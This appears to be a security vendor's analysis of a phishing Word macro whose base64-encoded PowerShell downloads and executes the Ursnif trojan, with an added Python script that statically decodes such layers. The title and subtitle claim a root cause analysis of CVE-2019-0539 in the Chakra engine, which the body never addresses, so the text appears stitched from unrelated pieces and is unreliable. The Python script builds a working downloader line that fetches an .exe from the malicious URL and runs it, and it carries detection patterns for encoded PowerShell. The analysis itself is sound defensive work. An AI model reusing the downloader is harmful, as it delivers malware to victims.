CVE-2019-0539 Root Cause Analysis
A dive into the root cause analysis of CVE-2019-0539 in Chakra javascript engine
Uri Ahronovich, Cyber Security Engineer
Perception Point’s platform recently caught an advanced threat directed at one of our customers, delivered inside a Microsoft Word file. The incident analysis below gives a detailed account of the attack and the damage it could have caused. Key observations regarding this attack:
One of our customers received an email that was flagged as “malicious” by Perception Point’s platform. This report includes a “what-if” analysis of the potential effect of the attack, had the malicious file not been blocked.
Perception Point’s engines identified the malicious activity by tracking the macro commands. We noticed the following anomalies: the macro is obfuscated, and the code is far longer than any legitimate purpose would require. The command lines as extracted by Perception Point’s platform:
1. Examining the Word .doc file in a contained environment shows that the macro runs an encoded PowerShell command.
2. The PowerShell command is base64 encoded.
3. Once the first layer is decoded, the resulting payload is as follows:
4. For the purpose of this analysis we removed the final command, “invoke-expression”, so that the next stage is displayed rather than executed, and then ran the command:
5. The PowerShell script downloads an .exe file from hxxp://zzajqwnewq.com/GGKO/chibura.php?l=anz9.yarn, saves it under a random name in a temp folder, and then executes it.
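The steps above (decode the base64 layer, drop “invoke-expression” so the next stage is revealed instead of run, read the downloader, pull out the URL) can be done statically without ever executing the script. The following Python script is an added example written for this write-up; it is not Perception Point’s tooling and the payload it processes is constructed, not the incident’s actual command. It assumes the macro launched PowerShell with the -EncodedCommand flag (whose base64 wraps UTF-16LE text, so the first layer must be decoded that way) and that the first layer hands a FromBase64String literal to Invoke-Expression; both are assumptions about the shape of the sample, not facts from the report.

```python
"""Static triage of a base64-encoded PowerShell downloader (added example).

Nothing here is executed: the layers are decoded, invoke-expression is
removed, and the URL is reported in defanged (hxxp) form.
"""
import base64
import re

# Constructed two-layer sample, NOT the real incident payload.  Layer 2 is
# the downloader; layer 1 decodes it and hands it to Invoke-Expression;
# the whole thing is base64(UTF-16LE) as -EncodedCommand expects.
def build_sample() -> str:
    downloader = (
        "$u='http://zzajqwnewq.com/GGKO/chibura.php?l=anz9.yarn';"
        "$p=$env:TEMP+'\\'+[guid]::NewGuid().ToString()+'.exe';"
        "(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process $p"
    )
    inner_b64 = base64.b64encode(downloader.encode("utf-8")).decode()
    layer1 = (
        "$s=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
        + inner_b64 + "'));Invoke-Expression $s"
    )
    enc = base64.b64encode(layer1.encode("utf-16-le")).decode()
    return "powershell -nop -w hidden -enc " + enc


# -EncodedCommand and its accepted abbreviations, followed by the base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# A nested base64 literal passed to FromBase64String(...).
B64_LITERAL = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.I)
# invoke-expression / iex at the start of a statement or after a pipe;
# anchoring on ';' or '|' keeps it from matching inside a base64 literal.
IEX = re.compile(r"(?:^|[;|])\s*(?:invoke-expression|iex)\b[^;]*", re.I)
URL = re.compile(r"\bh(?:xx|tt)ps?://[^\s'\"();]+", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Decode the -EncodedCommand argument: base64 over UTF-16LE, not ASCII."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def defuse(script: str) -> str:
    """Step 4 of the analysis: strip invoke-expression so the decoded stage
    is only displayed, never run."""
    return IEX.sub("", script).strip().rstrip(";")


def unwrap_layers(cmdline: str, max_depth: int = 5) -> list:
    """Return every decoded layer (outermost first) without executing any."""
    layers = [defuse(decode_encoded_command(cmdline))]
    for _ in range(max_depth):
        nested = B64_LITERAL.findall(layers[-1])
        if not nested:
            break
        layers.append(defuse(base64.b64decode(nested[0]).decode("utf-8", "replace")))
    return layers


def extract_iocs(script: str) -> list:
    """Collect URLs from a decoded layer, defanged (http -> hxxp)."""
    return sorted({re.sub(r"^http", "hxxp", u, flags=re.I) for u in URL.findall(script)})


if __name__ == "__main__":
    for i, layer in enumerate(unwrap_layers(build_sample()), 1):
        print(f"--- layer {i} ---\n{layer}")
    print("IOCs:", extract_iocs(unwrap_layers(build_sample())[-1]))
```

The same decode-and-defuse loop applies to real samples: replace build_sample() with the command line recovered from the macro. Because invoke-expression is removed before anything is displayed, the script never reaches a point where the downloader could run, which is exactly the effect of step 4 above.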
The downloaded executable is detected as TrojanSpy:Win32/Ursnif, a generic malware family with capabilities such as keylogging*, data theft, and command-and-control (C&C) communication.
*) A “keylogger” (short for “keystroke logger”) is software that records the keys struck on a keyboard, typically covertly, so the user does not know their actions are being monitored. It is usually used with malicious intent to collect account information, credit card numbers, usernames, passwords, and other private data.
This attack could have been very damaging for our customer: it was well disguised and highly effective once released.